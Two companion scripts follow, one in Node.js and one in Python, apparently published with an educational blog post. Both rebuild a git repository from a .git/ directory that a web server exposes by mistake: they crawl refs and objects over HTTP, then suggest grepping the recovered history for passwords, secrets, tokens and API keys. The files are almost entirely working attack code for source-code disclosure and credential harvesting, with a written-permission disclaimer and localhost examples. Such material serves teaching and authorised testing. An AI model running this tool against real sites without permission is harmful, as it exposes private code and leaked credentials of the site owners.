File: source-code-disclosure/scripts/git-dump.mjs
#!/usr/bin/env node
// git-dump.mjs — Reconstruct a git repository from an exposed .git/ directory
// served over plain HTTP. Node.js port of git-dump.py.
//
// Companion script to:
//   https://techearl.com/exposed-git-directory-attack
//
// Usage:
//   node git-dump.mjs <target-url> <output-dir>
//
// Example:
//   node git-dump.mjs http://localhost:8888/wp-content/uploads ./dumped
//
// Same strategy as the Python version:
//   1. Fetch the well-known .git/ index files (HEAD, refs/*, packed-refs, ...)
//   2. Extract SHA-1 references from each (40-char hex from text/commits,
//      20-byte binary from tree entries).
//   3. Fetch every object at .git/objects/aa/bbbb..., walk newly-discovered
//      SHAs, repeat until the queue is empty.
//   4. Inspect with a real `git` binary afterwards.
//
// Requires Node 18+ (uses the built-in global fetch). No npm dependencies.
//
// Legal: only run this against systems you own or have written permission
// to test.

import { mkdir, writeFile } from "node:fs/promises";
import { dirname, join } from "node:path";
import { inflateSync } from "node:zlib";

const UA =
  "git-dumper-edu/1.0 (+https://techearl.com/exposed-git-directory-attack)";
const SHA_RE = /\b[0-9a-f]{40}\b/g;
const TIMEOUT_MS = 15_000;

const KNOWN_FILES = [
  "HEAD",
  "config",
  "description",
  "info/refs",
  "info/exclude",
  "objects/info/packs",
  "packed-refs",
  "logs/HEAD",
  "FETCH_HEAD",
  "ORIG_HEAD",
  "refs/heads/main",
  "refs/heads/master",
  "refs/heads/develop",
  "refs/remotes/origin/HEAD",
  "refs/remotes/origin/main",
  "refs/remotes/origin/master",
];

async function fetchBytes(url) {
  const ctrl = new AbortController();
  const t = setTimeout(() => ctrl.abort(), TIMEOUT_MS);
  try {
    const res = await fetch(url, {
      headers: { "User-Agent": UA },
      signal: ctrl.signal,
    });
    if (!res.ok) return null;
    return Buffer.from(await res.arrayBuffer());
  } catch {
    return null;
  } finally {
    clearTimeout(t);
  }
}

async function save(outDir, rel, data) {
  const path = join(outDir, ".git", rel);
  await mkdir(dirname(path), { recursive: true });
  await writeFile(path, data);
}

function shasFrom(buf) {
  const out = new Set();

  // Pass 1: 40-char hex references (refs, commits, packed-refs, logs)
  const text = buf.toString("binary");
  for (const m of text.matchAll(SHA_RE)) out.add(m[0]);

  // Pass 2: tree-entry parser. Tree objects encode SHA-1 as raw 20 bytes
  // after each `<mode> <filename>\0` header. Format:
  //   "tree <length>\0(<mode> <name>\0<20-byte-sha>)+"
  if (buf.slice(0, 5).toString() === "tree ") {
    let i = buf.indexOf(0) + 1;
    while (i < buf.length) {
      const nul = buf.indexOf(0, i);
      if (nul === -1 || nul + 20 > buf.length) break;
      out.add(buf.slice(nul + 1, nul + 21).toString("hex"));
      i = nul + 21;
    }
  }
  return out;
}

function inflate(buf) {
  try {
    return inflateSync(buf);
  } catch {
    return buf;
  }
}

function objectUrl(base, sha) {
  return `${base}/.git/objects/${sha.slice(0, 2)}/${sha.slice(2)}`;
}

async function main() {
  const [, , target, outDirArg] = process.argv;
  if (!target || !outDirArg) {
    console.error(`usage: node ${process.argv[1]} <target-url> <output-dir>`);
    process.exit(2);
  }
  const base = target.replace(/\/+$/, "");
  const outDir = outDirArg;
  await mkdir(outDir, { recursive: true });

  const queue = new Set();
  const seen = new Set();

  // Phase 1: seed from known index files.
  for (const rel of KNOWN_FILES) {
    const data = await fetchBytes(`${base}/.git/${rel}`);
    if (!data) continue;
    await save(outDir, rel, data);
    for (const sha of shasFrom(data)) queue.add(sha);
    console.log(`  fetched .git/${rel} (${data.length} bytes)`);
  }

  // Phase 2: walk objects.
  while (queue.size > 0) {
    const sha = queue.values().next().value;
    queue.delete(sha);
    if (seen.has(sha)) continue;
    seen.add(sha);

    const data = await fetchBytes(objectUrl(base, sha));
    if (!data) continue;
    await save(outDir, `objects/${sha.slice(0, 2)}/${sha.slice(2)}`, data);
    for (const next of shasFrom(inflate(data))) {
      if (!seen.has(next)) queue.add(next);
    }
    console.log(
      `  fetched object ${sha}  (queue: ${queue.size}, seen: ${seen.size})`,
    );
  }

  console.log(`\nDone. Fetched ${seen.size} objects.`);
  console.log(`Reconstructed repo at: ${outDir}`);
  console.log(`\nNext steps:`);
  console.log(`  cd ${outDir}`);
  console.log(`  git fsck --full`);
  console.log(`  git log --all --oneline`);
  console.log(`  git log --all -p`);
  console.log(`  git log --all -p | grep -iE 'password|secret|token|api_key'`);
}

main();

File: source-code-disclosure/scripts/git-dump.py
#!/usr/bin/env python3
"""
git-dump.py — Reconstruct a git repository from an exposed .git/ directory
served over plain HTTP.

Companion script to:
  https://techearl.com/exposed-git-directory-attack

Usage:
  python3 git-dump.py <target-url> <output-dir>

Example:
  python3 git-dump.py http://localhost:8888/wp-content/uploads ./dumped

Strategy (lightweight, dependency-free):
  1. Fetch the well-known .git/ index files (HEAD, config, refs/*, packed-refs,
     logs/HEAD, info/refs, objects/info/packs).
  2. Parse them for every SHA-1 they reference.
  3. For each SHA-1, fetch .git/objects/aa/bbbb... (loose objects) and any
     pack files referenced from objects/info/packs.
  4. Walk newly-fetched commit/tree objects to discover further SHAs, repeat
     until the queue is empty.
  5. Hand the resulting directory to a real `git` binary for inspection:
       cd dumped && git log --all -p

This is intentionally simpler than tools like `git-dumper` and `GitTools/Dumper`
— it does not try to brute-force common filenames, and it relies on the standard
library only (no aiohttp, no concurrent.futures). The point is to show how the
attack works end-to-end in ~150 lines, not to replace those tools in a real
engagement.

Legal: only run this against systems you own or have written permission to test.
"""
from __future__ import annotations

import os
import re
import sys
import zlib
import urllib.request
import urllib.error
from pathlib import Path

UA = "git-dumper-edu/1.0 (+https://techearl.com/exposed-git-directory-attack)"
SHA_RE = re.compile(rb"\b[0-9a-f]{40}\b")
TIMEOUT = 15

# Files that almost always exist in a real .git/ directory and tell us about
# refs and pack files. Worth fetching unconditionally before we start walking
# objects.
KNOWN_FILES = [
    "HEAD",
    "config",
    "description",
    "info/refs",
    "info/exclude",
    "objects/info/packs",
    "packed-refs",
    "logs/HEAD",
    "FETCH_HEAD",
    "ORIG_HEAD",
    "refs/heads/main",
    "refs/heads/master",
    "refs/heads/develop",
    "refs/remotes/origin/HEAD",
    "refs/remotes/origin/main",
    "refs/remotes/origin/master",
]


def fetch(url: str) -> bytes | None:
    """GET url, return bytes or None on 4xx/5xx/timeout."""
    req = urllib.request.Request(url, headers={"User-Agent": UA})
    try:
        with urllib.request.urlopen(req, timeout=TIMEOUT) as r:
            return r.read()
    except (urllib.error.HTTPError, urllib.error.URLError, TimeoutError):
        return None


def save(out_dir: Path, rel: str, data: bytes) -> Path:
    """Write data to out_dir/.git/rel, creating parents as needed."""
    path = out_dir / ".git" / rel
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_bytes(data)
    return path


def shas_from(data: bytes) -> set[str]:
    """Extract SHA-1 references from data.

    Plain text refs (HEAD, packed-refs, logs/HEAD, etc.) and commit objects
    store SHA-1 as 40-char hex. Tree objects store SHA-1 as raw 20 binary
    bytes after the entry header: `<mode> <name>\\x00<20-byte-sha>`.
    We handle both."""
    out = {m.decode() for m in SHA_RE.findall(data)}

    # Tree-entry parser: object format starts with `tree <length>\x00`,
    # then repeating `<mode-octal> <filename>\x00<20-byte-sha>` entries.
    if data.startswith(b"tree "):
        i = data.index(b"\x00") + 1  # skip past the header
        while i < len(data):
            nul = data.find(b"\x00", i)
            if nul == -1 or nul + 20 > len(data):
                break
            sha_bytes = data[nul + 1 : nul + 21]
            out.add(sha_bytes.hex())
            i = nul + 21
    return out


def inflate(data: bytes) -> bytes:
    """Loose objects are stored zlib-compressed. Return inflated payload or
    raw bytes if inflation fails."""
    try:
        return zlib.decompress(data)
    except zlib.error:
        return data


def object_url(base: str, sha: str) -> str:
    return f"{base}/.git/objects/{sha[:2]}/{sha[2:]}"


def main() -> int:
    if len(sys.argv) != 3:
        print(f"usage: {sys.argv[0]} <target-url> <output-dir>", file=sys.stderr)
        return 2

    base = sys.argv[1].rstrip("/")
    out_dir = Path(sys.argv[2])
    out_dir.mkdir(parents=True, exist_ok=True)

    queue: set[str] = set()
    seen: set[str] = set()

    # Phase 1: fetch known index files and seed the SHA queue from them.
    for rel in KNOWN_FILES:
        data = fetch(f"{base}/.git/{rel}")
        if data is None:
            continue
        save(out_dir, rel, data)
        queue |= shas_from(data)
        print(f"  fetched .git/{rel} ({len(data)} bytes)")

    # Phase 2: walk objects. Every fetched commit/tree references more SHAs.
    while queue:
        sha = queue.pop()
        if sha in seen:
            continue
        seen.add(sha)

        url = object_url(base, sha)
        data = fetch(url)
        if data is None:
            continue
        save(out_dir, f"objects/{sha[:2]}/{sha[2:]}", data)
        new_shas = shas_from(inflate(data)) - seen
        if new_shas:
            queue |= new_shas
        print(f"  fetched object {sha}  (queue: {len(queue)}, seen: {len(seen)})")

    print()
    print(f"Done. Fetched {len(seen)} objects.")
    print(f"Reconstructed repo at: {out_dir}")
    print()
    print("Next steps:")
    print(f"  cd {out_dir}")
    print("  git fsck --full           # check what's recoverable")
    print("  git log --all --oneline   # see all commits we now have")
    print("  git log --all -p          # walk full history with diffs")
    print("  git log --all -p | grep -iE 'password|secret|token|api_key'")
    return 0


if __name__ == "__main__":
    sys.exit(main())
